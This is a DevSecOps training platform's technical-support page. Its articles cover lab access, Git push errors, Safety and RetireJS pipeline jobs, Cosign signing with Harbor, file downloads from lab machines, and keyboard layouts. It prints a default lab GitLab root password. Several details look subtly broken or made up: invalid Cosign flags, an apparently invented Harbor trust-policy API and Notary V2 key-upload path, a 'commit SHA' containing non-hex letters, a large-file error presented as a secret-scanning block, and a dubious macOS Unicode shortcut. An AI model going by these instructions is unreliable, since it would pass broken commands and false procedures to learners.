Home Technical Support

Technical Support

Assistance for enrolled learners with labs, content, and troubleshooting.
By Restu Muzakir and 2 others
58 articles

Learner Support

🚀 Quick Summary - 💬 Mattermost community for quick questions - AI Chatbot for your technical questions - 🎛️ Student portal for self-service - ⚡ Priority given to urgent issues - 👥 Support available from instructors, TAs, and peers 💬 Real-Time Community Support (Mattermost) Our Mattermost community channel provides ​https://chat.practical-devsecops.com/practical-devsecops/channels/town-square ​ ⚡ Real-time interaction with: - 👨‍🏫 Instructors (24/7 coverage) - 👨‍🏫 Teaching assistants - 👥 Fellow students worldwide 🎯 Ideal for: - ⚡ Quick questions - 📚 Course content clarifications - 🧪 Lab exercise discussions - 🔀 Exploring different approaches to problems - ❓ Clarifying personal doubts or questions 🤝 Benefits: - 💭 Multiple perspectives on the same problem - 🧠 Deeper understanding beyond quick fixes - 🌐 Networking and professional DevSecOps connections 🎛️ Self-Service Student Portal Your student portal gives immediate access to ​ ⚙️ Account & learning management: - 📊 Track course progress - ⚙️ Update account settings - 🧗 Access invoices and certificates - 📅 Schedule exams - ➕ Request lab extensions 📚 Helpful resources: - 📋 Exam guides - 🧪 Lab documentation - ❓ Frequently asked questions 👥 For organizations: Admins get additional team management tools ​ 💡 Pro Tip: Always check the portal first — many answers are available instantly without waiting! Common Question: Q1: Where to create the mattermost channel? A: Now we have moved from Mattermost to Chatwoot. You can ask your questions directly using the chat with support option on the portal.

Last updated on Mar 13, 2026

Common Technical Issues

🚀 Quick Summary: - 🌐 Use Chrome/Firefox browsers - 🧽 Clear cache for access issues - 🛡️ Check firewall settings - 🚫 Disable VPN if needed - 📶 10+ Mbps internet recommended - 🔑 Password reset via email 🧪 Most Common Issue: Lab Access Lab access issues often stem from network/browser settings, not platform problems: ​ 🌐 Browser Compatibility - ✅ Use supported browsers: Chrome and Firefox - 🧽 Clear browser cache and cookies - outdated session data blocks authentication - ⚙️ Ensure JavaScript is enabled - 🚫 Check that ad blockers aren't interfering ​ 🛡️ Network Troubleshooting - 🏢 Corporate networks: Verify firewall rules allow our cloud connections - 🚫 VPN issues: Temporarily disable to identify routing problems - 📶 Connection quality: Ensure stable internet access ​ 🎬 Video Playback Issues Typically related to bandwidth or browser capabilities: - 📶 Bandwidth requirements: 10+ Mbps for optimal HD streaming - 🔄 If experiencing buffering: - 📉 Reduce playback quality setting - ⏰ View during off-peak hours (less network congestion) - 📺 Streaming-only design ensures most current content - 🚫 No downloads available - always up-to-date materials 🔑 Account Access Problems Often simple issues with easy solutions: 📞 Password Reset - 📧 Process sends instructions to registered email, Email subject line - "Confirmation of Course Enrollment'' - ⏰ Didn't receive the email within minutes? Check spam folder - 🏢 Organizational filters sometimes miscategorize automated messages ✉️ Email Verification - ⚠️ Required for account activation - ✅ Ensure you've completed this step after registration ​ 🔒 Account Lockout - 📞 Multiple failed attempts? Contact support for recovery - 🔒 We follow industry leading security best practices to protect your account 🎬 Course Access Issues - After enrolling, check your inbox for "Confirmation of Course Enrollment" – this email contains instructions to schedule your start date. Since the course includes 60 days of lab access, you choose when to begin. - Haven't received it? Check your spam folder first, then contact support. 🏷️ How to Reset Lab Machines - You can refresh the exercise page and follow the instructions below. Please note that you will lose the data. Make sure you have already backed up your data. - Click the Reset my environment button, and a pop-up will appear. Read it carefully and click Yes, Reset my environment. The machine will then provision. ✅ Whitelist these domains (and subdomains) and open ports 80 and 443 (HTTP/HTTPS, websocket): - *.practical-devsecops.training/ - chat.practical-devsecops.com/ - *.lab.practical-devsecops.training - vimeo.com - https://chnl.portal.practical-devsecops.training 💡 Pro Tip: Most issues have simple solutions - try basic troubleshooting first! Common problem Q1: My GitLab / Dojo / Prod / Docker can’t be accessed A: Please ensure the following: - Stable internet connection and try to open the platform again. - Labs environment machine are properly provisioned (Not Red). - Please reload or reset the lab and try doing the lab exercise again. - If the issue persists, please contact the support team.

Last updated on Jan 27, 2026

Troubleshooting GitHub Repository Issues & Understanding CI/CD Tool Policies in DevSecOps Exams

Troubleshooting GitHub Repository Issues & Understanding CI/CD Tool Policies in DevSecOps Exams When you’re preparing for a DevSecOps certification, the last thing you want is to be stuck on a GitHub error or unsure about which CI/CD platform is allowed in the exam environment. This article consolidates the most common repository‑related problems—such as failed git push commands and “repository not found” messages—and clarifies the CI/CD tools you’ll encounter during the exam. Follow the step‑by‑step guidance, practical examples, and best‑practice tips to keep your labs running smoothly. Table of Contents 1. Why git push -u origin main Might Fail 2. Fixing “Repository Not Found” Errors 3. CI/CD Tool Policy for DevSecOps Exams 4. Quick Reference Checklist 5. Common Questions & Pro Tips 1. Why git push -u origin main Might Fail The command git push -u origin main is the standard way to publish your local main branch to a remote repository and set the upstream tracking reference. If the push hangs or returns an error, consider the following typical causes. 1.1. Mismatched Repository URL - Symptom: fatal: remote origin already exists or remote: Repository not found. - Root Cause: The URL configured for origin points to a different repository (e.g., a stale clone of django.nv, dvpa, or a Terraform project). - Solution: Verify and, if necessary, update the remote URL. # Show current remote URL git remote -v # Correct it (replace <USERNAME> and <REPO>) git remote set-url origin https://github.com/<USERNAME>/<REPO>.git 1.2. Incorrect Authentication (Username / Password) - Symptom: remote: Invalid username or password. - Root Cause: GitHub no longer accepts password authentication for Git over HTTPS. You must use a Personal Access Token (PAT) with the appropriate scopes (repo, workflow, etc.). - Solution: 1. Generate a new PAT in GitHub Settings → Developer settings → Personal access tokens. 2. Store it securely (e.g., using a credential manager). 3. When prompted for a password, paste the PAT instead. 1.3. Expired or Revoked PAT - Symptom: Same as above, but you know the token worked previously. - Solution: Re‑create the token with the same scopes and replace the old one in your credential store. 1.4. Public Repository with Secret‑Scanning Enforcement - Symptom: remote: error: GH001: Large files detected. You may want to try Git Large File Storage. or remote: error: secret scanning blocked this push. - Root Cause: GitHub’s secret‑scanning feature blocks pushes that contain exposed secrets (API keys, passwords, etc.) in public repos such as django.nv. - Solution: - Scan your commit history locally with tools like git-secrets, truffleHog, or GitGuardian. - Remove or rotate any leaked secrets, then force‑push the cleaned history (if allowed by the exam’s policies). 1.5. Branch Naming Mismatch - Symptom: error: src refspec main does not match any. - Root Cause: Your local branch is named master or something else, not main. - Solution: Either rename the branch or push the correct branch name. git branch -m master main # rename locally git push -u origin main # push again 2. Fixing “Repository Not Found” Errors When Git returns “repository not found” it’s usually a configuration or permission issue. | Possible Issue | How to Diagnose | Fix | |----------------|----------------|-----| | Wrong URL | Run git remote -v and compare with the URL shown on GitHub. | Update with git remote set-url origin <correct‑url> | | Missing Access Rights | Verify you can open the repo in a browser using the same account. | Request collaborator access or fork the repo to your account. | | Organization/Team Restrictions | Some exam repos are hosted under a private organization. | Ensure you’re logged in with the correct organization account. | | Two‑Factor Authentication (2FA) Enabled | Git over HTTPS without a PAT will fail. | Use a PAT as described in Section 1.2. | | Deleted or Renamed Repo | Check the repo’s page; a 404 indicates it’s gone. | Ask the course facilitator for the new repository location. | 3. CI/CD Tool Policy for DevSecOps Exams 3.1. Which Platforms Are Allowed? - GitLab – the only CI/CD system used in all official exams. - Jenkins – not available in the exam environment. - CircleCI – also not available. All exam pipelines are pre‑configured in GitLab CI/CD (.gitlab-ci.yml). You’ll be expected to interact with GitLab runners, view job logs, and troubleshoot pipeline failures using only GitLab’s UI and CLI tools. 3.2. Why GitLab Only? - Standardized Environment: Guarantees that every candidate works with the same runner images, variables, and security policies. - Built‑in Security Scanning: GitLab includes secret detection, container scanning, and dependency scanning out‑of‑the‑box, aligning with the DevSecOps focus of the certification. - Simplified Grading: Automated assessment scripts can reliably parse GitLab pipeline results. Tip: If you’re accustomed to Jenkins or CircleCI, spend a few hours exploring GitLab CI/CD documentation before the exam. The syntax (stages, jobs, variables) is similar, but the UI differs. 4. Quick Reference Checklist Before you run git push or start a pipeline, run through this checklist: 1. Confirm Remote URL – git remote -v matches the GitHub repo you see in the browser. 2. Validate Authentication – PAT is stored and not expired; 2FA is accounted for. 3. Check Branch Name – You’re on main (or the branch the exam expects). 4. Scan for Secrets – Run git secrets --scan or similar. 5. Verify Repo Visibility – Public repos may have secret‑scanning rules; private repos avoid this but require proper permissions. 6. Know the CI/CD Platform – Only GitLab pipelines are evaluated; no Jenkins or CircleCI steps. 5. Common Questions & Pro Tips Q1: Can I use SSH instead of HTTPS for Git operations? A: Yes, but you must add your SSH public key to your GitHub account. In the exam, the provided instructions usually specify HTTPS with a PAT, so follow those to avoid confusion. Q2: What if I accidentally push a secret? A: Immediately revoke the exposed credential, generate a new one, and replace the secret in the repository using a filter‑branch or BFG Repo‑Cleaner. Then push the cleaned history. Q3: My pipeline fails with “secret detection” even though I didn’t add any secrets. A: GitLab’s secret scanner can flag patterns that look like keys (e.g., AKIA...). Rename variables or use GitLab’s masking feature (variables: with masked: true) to suppress false positives. Q4: Do I need to install any extra tools on the exam machine? A: No. All required tools (Git, Docker, GitLab Runner) are pre‑installed. You only need to use the command line and the web UI. Q5: What is the default credential to access the Gitlab CE Web portal? A: The default credential for the gitlab is: username: root and password: pdso-training Pro Tip: Use Git’s Verbose Mode Add -v to any Git command (git push -v) to see detailed HTTP request/response data. This often reveals authentication problems faster than the generic error message. Pro Tip: Bookmark the Exam GitLab Instance Keep the URL of the exam’s GitLab instance handy. It typically looks like https://gitlab.example.com/<course>/<project>. Direct navigation saves time when you need to view pipeline logs. Wrap‑Up By systematically verifying your remote configuration, authentication method, and repository contents, you can eliminate the majority of Git push failures. Remember that GitLab is the exclusive CI/CD platform for DevSecOps exams, so focus your practice on its pipelines and built‑in security scans. Keep this article as a quick‑reference guide, and you’ll be better prepared to troubleshoot on the fly and stay within exam policies. Good luck, and happy coding!

Last updated on Jan 27, 2026

Integrating Security Scanning Tools into GitLab Pipelines – A Practical Guide

Integrating Security Scanning Tools into GitLab Pipelines – A Practical Guide Security‑focused CI/CD pipelines are a cornerstone of modern DevSecOps. This article walks you through the most common hurdles learners face when adding Safety (Python dependency scanner) and RetireJS (JavaScript component analyzer) to GitLab pipelines. You’ll learn how to interpret version specifiers, structure pipeline jobs, filter high‑severity findings, and correctly use the supporting files (requirements.txt, package.json, .retireignore.json). 1. Why the “unpinned requirement” warning appears in Safety The warning explained When you run the Safety step in the Fix issues reported by Safety lab you may see: Warning: unpinned requirement 'Django' found in requirements.txt, unable to check. This is not an error; it’s a warning that Safety cannot verify a dependency that isn’t pinned to a specific version. Understanding Python version specifiers | Specifier | Meaning | Example outcome | |-----------|---------|-----------------| | Django==2.2.25 | Install exactly version 2.2.25 | Only 2.2.25 is used | | Django>=2.2.25 | Install any version ≥ 2.2.25 | 2.2.25, 2.3.0, 3.0.0 … | | Django~=2.2.25 | Install the latest minor release within the same major/minor series | 2.2.25, 2.2.26, 2.2.27 … but not 2.3.0 | The tilde (~) is intentional – it tells pip to fetch the newest patch release while staying within the 2.2.x line. If you prefer a fully pinned version, replace ~= with ==. Reference: PEP 440 – Version Specifiers 2. Embedding Safety into a GitLab pipeline Two‑job pattern (recommended) Safety requires a Docker image that contains the safety binary, while your unit‑test job needs a Python image. Keeping them separate avoids image‑conflict issues. # .gitlab-ci.yml stages: - test # 1️⃣ Unit‑test job – runs your Python code test: stage: test image: python:3.6 before_script: - pip3 install --upgrade virtualenv script: - virtualenv env - source env/bin/activate - pip install -r requirements.txt - python manage.py test taskManager # 2️⃣ Safety scanning job – uses the official Safety image oast: stage: test script: - docker pull hysnsec/safety # fetch the scanner - docker run --rm -v $(pwd):/src hysnsec/safety check -r requirements.txt --json > oast-results.json artifacts: paths: [oast-results.json] when: always allow_failure: true Why two jobs? - Different base images (python:3.6 vs. hysnsec/safety). - Clear separation of concerns – unit testing vs. security scanning. - Each job can fail independently without breaking the other stage. If you see docker: command not found, verify that the GitLab Runner is configured with Docker‑in‑Docker (DinD) or that you’re using a shared runner that supports Docker commands. 3. Software Component Analysis with RetireJS Goal of the challenge Identify high‑severity JavaScript vulnerabilities, mark them as false positives (FPs), and store those markings in a .retireignore.json file. Step‑by‑step workflow 1. Run RetireJS and generate JSON output script: - npm install # installs project deps from package.json - npm install -g retire # installs the retire CLI globally - retire --outputformat json --outputpath retire_output.json npm install reads the package.json in the current directory and installs every dependency listed under dependencies and devDependencies. 2. Filter high‑severity findings Use jq (a lightweight JSON processor) to extract only the records you need: jq '.data[].results[]' retire_output.json | grep -E 'component|version|high' What it does: - jq '.data[].results[]' walks into the results array of each scanned file. - grep -E 'component|version|high' prints lines containing the component name, its version, or the word “high”. The result is a list of vulnerable components with high severity. 3. Create the .retireignore.json file For every high‑severity entry you decide is a false positive, add an object to the ignore file: [ { "component": "qs", "version": "0.6.6", "justification": "Vulnerable class is not used" }, { "component": "handlebars", "version": "4.0.5", "justification": "Vulnerable class is not used" } ] The structure follows the RetireJS specification: you can ignore by component, component + version, or by path (e.g., node_modules). 4. Optional: Download the JSON locally If you prefer a GUI editor, copy retire_output.json from the runner’s workspace to your machine (e.g., via the GitLab UI “Download artifacts” button) and edit it with Sublime, VS Code, or any text editor. 4. Where do package.json and requirements.txt come from? - package.json – Part of the Node.js source code you are scanning. It lists JavaScript libraries under dependencies and devDependencies. The npm install command reads this file and materialises the node_modules folder. - requirements.txt – The Python counterpart located in the Python project’s repository. It enumerates third‑party packages (e.g., Django~=2.2.25). Safety reads this file to perform its vulnerability check. Both files are checked into the lab repository; they are not generated by Docker images. 5. Tips & Common Questions | Issue | Quick Fix | |-------|-----------| | docker: command not found in Safety job | Ensure the runner has Docker enabled (DinD) or use a shared runner that provides Docker. | | “Warning: unpinned requirement” persists | Pin the version with == or keep ~= and accept the warning (it does not stop the pipeline). | | No high‑severity findings in RetireJS output | Verify you are scanning the correct directory (npm install must finish first) and that the target libraries have known CVEs. | | .retireignore.json not honoured | Confirm the file is placed at the repository root and follows proper JSON syntax (no trailing commas). | | Artifacts not appearing after Safety scan | Add artifacts: section to the job (as shown above) and make sure when: always is set if you want results even on failure. | 6. Conclusion Integrating Safety and RetireJS into GitLab pipelines enhances your DevSecOps posture by catching vulnerable third‑party components early. Remember to: - Use explicit version specifiers for Python dependencies. - Separate jobs when they require different Docker images. - Leverage jq to isolate high‑severity findings and create a clean .retireignore.json. - Understand that package.json and requirements.txt are part of the source code you are scanning. With these practices in place, your pipelines will reliably test functionality and enforce security standards, keeping your applications safe and compliant. Happy scanning!

Last updated on Jan 06, 2026

Troubleshooting Lab Access and Platform Login Issues for DevSecOps Learners

Troubleshooting Lab Access and Platform Login Issues for DevSecOps Learners If you’re enrolled in a DevSecOps course and can’t see your course, access your labs, or connect to essential platforms like GitLab, Dojo, Production, or Docker, you’re not alone. This guide walks you through the most common reasons these problems occur and provides step‑by‑step solutions so you can get back to learning quickly. Introduction A smooth learning experience hinges on reliable access to course content and hands‑on labs. However, connectivity hiccups, provisioning delays, or simple configuration oversights can block progress. By following the troubleshooting steps outlined below, you’ll be able to verify your enrollment, confirm that lab environments are ready, and resolve platform‑specific login issues without needing to wait for support. 1. My Course Is Not Listed in the Dashboard Why it Happens - Incorrect email address used during registration. - Course activation delay – the platform may need up to 1 hours after the scheduled start time to publish the course. How to Fix It 1. Confirm the email you used - Log in to the learning portal. - Check the email displayed in the top‑right corner. - If it differs from the address you used to enroll, log out and sign in with the correct email. 2. Wait for the activation window - Courses typically appear within 1 hours of the announced start time. - Refresh the dashboard every 15 minutes during this window. 3. Contact support if the course is still missing - Provide: - Your full name and enrollment ID. - The email address you used to register. - The exact course name and scheduled start time. Tip: Keep a screenshot of the empty dashboard page; it speeds up support resolution. 2. I Can’t Access My Labs Common Causes - Wrong enrollment email (same root cause as above). - Lab environment not yet provisioned (the status indicator appears red). - Network instability or firewall restrictions. 3. I Can’t Access GitLab, Dojo, Production, or Docker Environments These platforms are essential for completing hands‑on exercises. Follow the checklist below to troubleshoot access issues. Checklist 1. Internet Connectivity - Test by visiting a public website (e.g., https://www.google.com). - If the page fails to load, restart your router or switch to a different network. 2. Lab Machine Health - Confirm the lab VM status is green (not red). - If the VM is red, the underlying infrastructure may be experiencing an outage; wait a few minutes and retry. 3. Platform‑Specific Steps - GitLab - Ensure you are using the link that provided in the lab instructions. - Clear browser cookies for gitlab and try again. - Dojo - Verify the Dojo URL matches the one listed in the lab (typos are common). 4. Reload or Reset - After confirming the above, click Reload on the lab toolbar. - If the issue remains, use Reset Lab to re‑initialize the environment. 5. Contact Support - Provide: - Platform name (GitLab, Dojo, etc.). - Exact error message or screenshot. - Lab ID and timestamp of the failure. Common Questions & Quick Tips | Question | Quick Answer | |----------|--------------| | Why does my course appear after I log in with a different email? | The system ties course enrollment to the email used at purchase. Switching to that address resolves the issue. | | My lab stays red for more than 15 minutes. What now? | This indicates a provisioning failure. Restart the environment. If the issue still persists, you can contact the support team via the Chat with support button with the headset icon. | | Do I need VPN to access the labs? | No. In fact, VPNs can sometimes block the required ports. Use a direct internet connection. | Conclusion Access problems can be frustrating, but most are solvable with a systematic check of enrollment details, lab provisioning status, and network conditions. By using the troubleshooting flowcharts in this article, you’ll spend less time waiting and more time mastering DevSecOps concepts. Keep this guide handy, and don’t hesitate to contact support when you need a deeper dive.

Last updated on Mar 13, 2026

Understanding Cosign Key Trust in Harbor and How to Use `revision_id` for Model Versioning

Understanding Cosign Key Trust in Harbor and How to Use revision_id for Model Versioning In modern DevSecOps pipelines, Cosign is the go‑to tool for signing container images, while Harbor acts as a trusted registry that validates those signatures. Learners often wonder how Harbor can “trust” a key that you generate on your own laptop, and they also encounter the revision_id field when working with AI/ML models in labs. This article demystifies both concepts, explains the underlying mechanics, and shows you where to find the exact revision_id for a model hosted on Hugging Face. Table of Contents 1. Why Does Harbor Trust a Self‑Signed Cosign Key? 2. How Cosign Signing Works – A Quick Walkthrough 3. What Is revision_id and Why It Matters 4. Locating the revision_id of a Hugging Face Model 5. Practical Example: Signing an Image and Pinning a Model Version 6. Common Questions & Tips Why Does Harbor Trust a Self‑Signed Cosign Key? Even though the key pair you generate with Cosign is technically self‑signed (there is no external certificate authority), Harbor can still verify signatures because trust is established by explicit key registration, not by a third‑party issuer. Key Points - Ownership Declaration: By uploading the public key to Harbor, you tell the registry, “I am the owner of the matching private key.” - Private Key Confidentiality: The private key never leaves your workstation; it is used only to create signatures. - Verification Only: Harbor uses the stored public key solely to verify that a signature was produced by the corresponding private key. It cannot generate new signatures. - Policy Enforcement: Harbor can be configured with policies (e.g., “only accept images signed with keys listed in the trusted‑key store”). As long as the public key appears in that store, any image signed with the matching private key is accepted. Think of the public key like a government‑issued ID that you present at an airport. The ID isn’t “signed” by a separate authority, but the airport trusts it because it follows a known verification process. How Cosign Signing Works – A Quick Walkthrough 1. Generate a key pair on your development machine cosign generate-key-pair - cosign.key → private key (kept secret) - cosign.pub → public key (shared with Harbor) 2. Upload the public key to Harbor - In the Harbor UI, navigate to Administration → Interoperability → Notary V2 (or the “Signature Trust” section) and add cosign.pub. 3. Sign a container image cosign sign -key cosign.key myregistry.example.com/myapp:1.2.3 4. Push the signed image to Harbor. Harbor automatically verifies the signature using the stored public key. If the verification succeeds, the image is marked as trusted and can be promoted through your CI/CD pipeline. What Is revision_id and Why It Matters When you work with pre‑trained models from platforms like Hugging Face, the underlying model files can change over time (bug fixes, new weights, licensing updates). To guarantee reproducibility in labs and exams, you need a stable reference to a specific version of the model. - revision_id: A unique identifier (usually a Git commit SHA) that pins the model to an exact snapshot in the repository. - Why pin it? - Prevents breaking changes when the model author pushes updates. - Ensures that every learner runs the same code and gets identical inference results. - Makes debugging easier because the exact code base is known. In practice, you add revision_id to your requirements.txt, Dockerfile, or pipeline configuration to lock the model version. Locating the revision_id of a Hugging Face Model 1. Open the model’s page on huggingface.co (e.g., https://huggingface.co/facebook/opt-125m). 2. Click the “Files and versions” tab. 3. Locate the commit hash displayed near the top of the file list – this is the revision_id. It looks like a 40‑character string, e.g., a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9t0. 4. Use that string in your code: from transformers import AutoModelForCausalLM, AutoTokenizer model_name = "facebook/opt-125m" revision_id = "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9t0" tokenizer = AutoTokenizer.from_pretrained(model_name, revision=revision_id) model = AutoModelForCausalLM.from_pretrained(model_name, revision=revision_id) Tip: Some repositories also expose the revision_id via the API endpoint https://huggingface.co/api/models/<repo_id>. Look for the sha field in the JSON response. Practical Example: Signing an Image and Pinning a Model Version Below is a concise end‑to‑end scenario that combines both concepts: # 1️⃣ Generate Cosign keys (once per developer) cosign generate-key-pair -output-key cosign.key # 2️⃣ Register the public key in Harbor (UI step) # 3️⃣ Build a Docker image that includes a specific model version cat > Dockerfile <<'EOF' FROM python:3.11-slim RUN pip install torch transformers ENV MODEL_NAME=facebook/opt-125m ENV REVISION_ID=a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9t0 RUN python - <<PY from transformers import AutoModelForCausalLM, AutoTokenizer tokenizer = AutoTokenizer.from_pretrained("$MODEL_NAME", revision="$REVISION_ID") model = AutoModelForCausalLM.from_pretrained("$MODEL_NAME", revision="$REVISION_ID") print("Model loaded successfully") PY EOF docker build -t myregistry.example.com/nlp/opt:latest . docker push myregistry.example.com/nlp/opt:latest # 4️⃣ Sign the image cosign sign -key cosign.key myregistry.example.com/nlp/opt:latest - Result: Harbor verifies the signature using the public key you uploaded. - Result: All learners pulling myregistry.example.com/nlp/opt:latest will use the exact same model snapshot defined by revision_id. Common Questions & Tips | Question | Answer | |----------|--------| | Do I need a CA to use Cosign? | No. Cosign relies on asymmetric cryptography; the trust anchor is the public key you register in Harbor. | | Can I rotate a Cosign key? | Yes. Generate a new key pair, update the public key in Harbor, and re‑sign any images you want to trust under the new key. | | What if the model author deletes the commit referenced by revision_id? | The model becomes unavailable through that exact revision. In practice, Hugging Face keeps all commits, but you can always fork the repository to preserve the snapshot. | | Is revision_id the same as a tag? | Not exactly. A tag is a human‑readable label (e.g., v1.0). revision_id is the immutable commit SHA that the tag points to. Pinning by SHA guarantees immutability. | | How do I list all trusted keys in Harbor? | In Harbor UI: Administration → Interoperability → Notary V2. You can also query the REST API: GET /api/v2.0/trust/policies. | | Can I automate key registration? | Yes. Harbor’s API allows you to POST a public key to /api/v2.0/trust/policies. Include this step in your CI pipeline for repeatable setups. | Quick Tips - Store your private key in a secret manager (e.g., HashiCorp Vault, Azure Key Vault) rather than on disk. - Version‑control your revision_id in a versions.yaml file so that updates are auditable. - Enable Harbor’s “signature enforcement” policy to reject unsigned images automatically. - Validate the model checksum (e.g., SHA256) after download to catch any tampering beyond the revision_id. Wrap‑Up Harbor’s trust model for Cosign hinges on explicit public‑key registration, not on traditional certificate authorities. By keeping the private key secret and sharing the public key with Harbor, you create a reliable chain of trust for your container images. Meanwhile, the revision_id field is your safety net for AI/ML model reproducibility, allowing you to lock in an exact commit from Hugging Face (or any Git‑backed model hub). Knowing where to locate the SHA and how to embed it in your pipelines ensures that every learner, auditor, or production system works with the same model version, eliminating “it works on my machine” surprises. Armed with these concepts, you can confidently build secure, reproducible DevSecOps labs that combine signed container images with pinned model versions—key ingredients for modern, trustworthy software delivery.

Last updated on Jan 06, 2026

Technical Support Guide: Resolving Common Lab Environment Issues in DevSecOps Courses

Technical Support Guide: Resolving Common Lab Environment Issues in DevSecOps Courses Whether you’re preparing for a DevSecOps certification exam or working through hands‑on labs, a smooth lab environment is essential. This guide consolidates the most frequently reported problems—such as 404 errors, lost internet connectivity, and file‑download hurdles—and provides clear, step‑by‑step solutions so you can stay focused on learning rather than troubleshooting. Table of Contents 1. Understanding the “404 – Not Found” Message on CASP‑PM Machines 2. What to Do When Your Internet Connection Drops During an Exam 3. Downloading Files from the DevSecOps‑Box Instance 4. Downloading Files from the Control‑Plane Instance 5. Quick Tips & Best Practices 1. Understanding the “404 – Not Found” Message on CASP‑PM Machines Why the 404 Error Appears A 404 status code does not indicate that the CASP‑PM machine is missing. Instead, it confirms that the machine is reachable but the specific URL you requested does not exist. How to Access CASP‑PM Correctly Use the predefined entry points that are guaranteed to be available: | Path | Full URL Example | |------|------------------| | Home | https://casp-pm-<MACHINE_ID>.lab.practical-devsecops.training/home | | Login | https://casp-pm-<MACHINE_ID>.lab.practical-devsecops.training/login | Steps to Reach the Home Page 1. Locate your unique <MACHINE_ID> (displayed on the lab dashboard or in the welcome email). 2. Replace <MACHINE_ID> in the URL pattern above. 3. Open the URL in a modern browser (Chrome, Edge, or Firefox). If you still encounter a 404, double‑check the machine ID for typos and ensure you are using HTTPS for the /home and /login endpoints. 2. What to Do When Your Internet Connection Drops During an Exam Immediate Impact - Disconnection: Your browser session is terminated, and you lose real‑time access to the lab machines. - Machine State: The virtual machines retain their current state—no automatic reset occurs. Re‑connection Procedure 1. Restore Connectivity – Switch back to a stable network (Wi‑Fi, wired Ethernet, or a stronger mobile data signal). 2. Return to the Cloud Lab Portal – Navigate to the same exam URL you used before. 3. Authenticate Again – Log in with your exam credentials when prompted. 4. Resume Work – You will be redirected to the same lab environment, and all previous changes remain intact. Inactivity Timeout - 30‑minute rule: If the disconnection lasts longer than 30 minutes, the platform may automatically terminate the instance to free resources. - Result: The machine will be reset, and you will need to restart the exercise from the beginning. Recommendations to Minimize Disruptions - Prefer Wi‑Fi or wired connections over mobile data when possible. - Close bandwidth‑heavy applications (e.g., video streaming) while the exam is active. - Keep a backup power source (portable charger or UPS) for laptops. - Test your connection a few minutes before the exam by loading a non‑critical web page. 3. Downloading Files from the DevSecOps‑Box Instance The DevSecOps‑Box is a pre‑configured Ubuntu VM that hosts course materials, scripts, and sample data. To retrieve files quickly, you can spin up a temporary HTTP server. Step‑by‑Step Instructions 1. Open a terminal inside the DevSecOps‑Box machine. 2. Start the HTTP server on port 80: python3 -m http.server 80 Tip: If port 80 is already in use, you can select another port (e.g., 8080) and adjust the URL accordingly. 3. Find your Machine ID (if you don’t already know it). Ask the support bot or check the lab dashboard; the ID appears in the instance name, e.g., devsecops-box-5f2a3c. 4. Access the file list from any browser on your local computer: https://devsecops-box-<MACHINE_ID>.lab.practical-devsecops.training 5. Download the required files by clicking the links or using wget/curl: wget https://devsecops-box-<MACHINE_ID>.lab.practical-devsecops.training/<filename> Security Note - The temporary server runs without authentication; only share the URL with yourself and close the server (Ctrl+C) once downloads are complete. 4. Downloading Files from the Control‑Plane Instance The Control‑Plane VM often hosts configuration files, logs, or additional tooling. Because it uses a public IP address, you’ll need to retrieve that IP first. Procedure 1. Open a terminal on the Control‑Plane machine. 2. Launch the HTTP server (same command as above): python3 -m http.server 80 3. Obtain the public IP by running: curl ifconfig.me Example output: 13.215.226.108 4. Navigate to the server from your local browser: http://13.215.226.108/ 5. Download needed files as you would from any web directory, or use command‑line tools: wget http://13.215.226.108/<filename> Important Considerations - The server runs on HTTP, not HTTPS, because it is bound to a raw IP address. - As with the DevSecOps‑Box, shut down the server (Ctrl+C) after you finish downloading to avoid unnecessary exposure. 5. Quick Tips & Best Practices - Bookmark Frequently Used URLs – Save the /home and /login URLs for each lab machine to avoid typing errors. - Use a Dedicated Browser Profile – Isolate your exam session from personal browsing to reduce cookie or cache conflicts. - Document Your Machine IDs – Keep a simple text file with all IDs and IPs; copy‑paste reduces mistakes. - Test the HTTP Server Before the Exam – Run python3 -m http.server a few minutes early to verify firewall rules and network reachability. - Monitor Inactivity – Set a timer on your workstation to remind you to stay active if you must step away briefly. - Know the Reset Policy – If you’re forced to restart a lab, you can usually request a fresh instance from the lab dashboard; the process is automated and takes less than a minute. Need More Help? If you encounter a problem that isn’t covered here, reach out to the DevSecOps support team through the Live Chat button in the lab portal, or submit a ticket with the following details: - Course name and module - Machine ID(s) involved - Exact error messages or screenshots - Timezone and approximate time of the issue Prompt, detailed information enables the support engineers to resolve your case faster, keeping your learning momentum on track. Good luck, and happy hacking!

Last updated on Jan 06, 2026

Troubleshooting Common Lab Issues: Keyboard Input, Vault Paths, GitLab SSH Access, and Repository Locations

Troubleshooting Common Lab Issues: Keyboard Input, Vault Paths, GitLab SSH Access, and Repository Locations Learn how to resolve frequent technical challenges you may encounter while working through DevSecOps labs, from typing special characters on a German‑Mac keyboard to locating GitLab repositories on the host machine. Introduction Hands‑on labs are an essential part of any DevSecOps training, but they can sometimes be hampered by small technical roadblocks. Learners often ask about: 1. Entering the pipe (|) and bracket characters on a German‑Mac keyboard while using Firefox. 2. Understanding whether Vault paths are fixed or can be customized. 3. Connecting to GitLab‑hosted machines via SSH. 4. Locating the physical directory where a GitLab repository lives on the host system. This article consolidates clear, step‑by‑step guidance for each of these scenarios, complete with practical examples and best‑practice tips. By the end of the read, you’ll be able to type the required symbols, configure Vault paths confidently, SSH into the correct GitLab nodes, and inspect repository files directly on the host. 1. Typing Pipe (|) and Brackets on a German‑Mac Keyboard in Firefox Why the Problem Occurs Mac keyboards with a German layout map many symbols to different key combinations than the US layout. Firefox (and some remote lab consoles) may not interpret the default shortcuts correctly, causing symbols like |, {, } or [ ] to be ignored. Quick Fix: Switch to the US Keyboard Layout | Step | Action | |------|--------| | 1 | Open System Settings → Keyboard → Input Sources. | | 2 | Click the + button, select English – U.S., and add it. | | 3 | Optionally, enable Show input menu in menu bar to toggle quickly. | | 4 | In Firefox, switch to the U.S. input source (menu bar icon) before typing the symbols. | Result: All standard US symbols—including |, {, }, [, and ]—work as expected in the lab console. Alternative: Use Unicode Key Codes (If you cannot change the layout) | Symbol | macOS Unicode entry (hold Option + ⌘ + U, then type) | |--------|------------------------------------------------------------| | Pipe (|) | \007C | | Left Bracket ([) | \005B | | Right Bracket (]) | \005D | | Curly Brace ({) | \007B | | Curly Brace (}) | \007D | Tip: Adding the US layout is the most reliable method for repeated lab work. 2. Defining Custom Paths in HashiCorp Vault Understanding Vault Paths - Paths are hierarchical identifiers (e.g., secret/data/myapp/config) that organize secrets, policies, and auth methods. - They are not hard‑coded; you create them to match your organization’s structure. Can You Use Any Path? Yes. You may define any path that complies with 